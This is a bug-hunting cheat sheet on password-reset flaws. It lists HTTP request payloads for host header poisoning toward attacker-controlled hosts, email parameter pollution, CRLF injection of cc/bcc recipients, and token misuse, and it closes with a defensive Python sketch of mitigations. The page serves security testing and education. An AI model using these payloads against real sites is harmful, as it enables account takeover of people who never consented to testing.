# Password-reset

Main source:  [`https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef`](https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef)

And : <https://anugrahsr.github.io/posts/10-Password-reset-flaws/>

{% embed url="https://book.hacktricks.xyz/pentesting-web/reset-password" %}

## Exploit:

## 1. Token Leakage via Host Header Poisoning. <a href="#id-1aab" id="id-1aab"></a>

```
GET https://redacted.com/reset.php?email=foo@bar.com HTTP/1.1
host: evil.com
```

```
 Host: target.com
 X-Forwarded-Host: attacker.com
```

```
 Host: target.com
 Host: attacker.com
```

## 2. Sending an array of email addresses instead of a single email address. <a href="#id-353d" id="id-353d"></a>

```
{"email_address":["admin@breadcrumb.com","attacker@evil.com"]}
```

## 3. Password Reset By Manipulating Email Parameter:

```sh
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
{"email":["victim@mail.tld","attacker@mail.tld"]}
```

## 4. Bruteforcing OTP for Resetting Password. <a href="#id-34e2" id="id-34e2"></a>

## 5. Password Reset Token Leak Via Referrer. <a href="#id-031c" id="id-031c"></a>

```
1. Request a password reset to your own email address
2. Click on the password reset link
3. Don't change the password
4. Click any 3rd-party link on the page (e.g. Facebook, Twitter)
5. Intercept the request in the Burp Suite proxy
6. Check whether the Referer header is leaking the password reset token
```

## 6. Response manipulation: Replace Bad Response With Good One <a href="#id-3ac2" id="id-3ac2"></a>

## 7. Changing Email And Password of any User through API Parameters

```sh
POST /api/changepass
[...]
{"form": {"email":"victim@email.tld","password":"12345678"}}
```

## 8. Using Attacker Token

```sh
POST /resetPassword
[...]
email=victim@email.com&code=$ATTACKER_TOKEN$
```
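As an added defensive example (not code from the original page or its sources), the following Python sketches how a reset endpoint closes the gaps in sections 1, 2, 3 and 8: the link is built from a hard-coded canonical origin instead of the Host header, the `email` parameter must appear exactly once as a single string with no CR/LF or separator characters, and a token is only accepted together with the account it was issued to. All function names and configuration values are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlencode

# Constructed configuration (assumption): the application knows its own origin,
# so reset links are never derived from Host or X-Forwarded-Host.
CANONICAL_ORIGIN = "https://example.com"
ALLOWED_HOSTS = {"example.com"}


def host_is_trusted(headers):
    """Section 1: exactly one Host header, and it must name our own host.
    X-Forwarded-Host is ignored; duplicate Host headers are rejected."""
    hosts = [v.strip().lower() for k, v in headers if k.lower() == "host"]
    return len(hosts) == 1 and hosts[0] in ALLOWED_HOSTS


def parse_single_email(params):
    """Sections 2 and 3: the email parameter must appear exactly once, as a
    single string (not a list), with no CR/LF or separator characters that
    could smuggle a second recipient into the outgoing mail."""
    values = [v for k, v in params if k == "email"]
    if len(values) != 1 or not isinstance(values[0], str):
        return None
    email = values[0].strip()
    if email.count("@") != 1 or any(c in email for c in "\r\n,;| \"'"):
        return None
    return email


def issue_reset_link(email):
    """Builds the link from CANONICAL_ORIGIN and returns it together with the
    record the server should store: only a hash of the token, bound to the account."""
    token = secrets.token_urlsafe(32)
    record = {"email": email,
              "token_hash": hashlib.sha256(token.encode()).hexdigest()}
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}", record


def token_matches(record, presented_token, presented_email):
    """Section 8: a token is valid only with the account it was issued to,
    so a token issued to one account cannot reset another account's password."""
    digest = hashlib.sha256(presented_token.encode()).hexdigest()
    return (hmac.compare_digest(digest, record["token_hash"])
            and record["email"] == presented_email)
```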


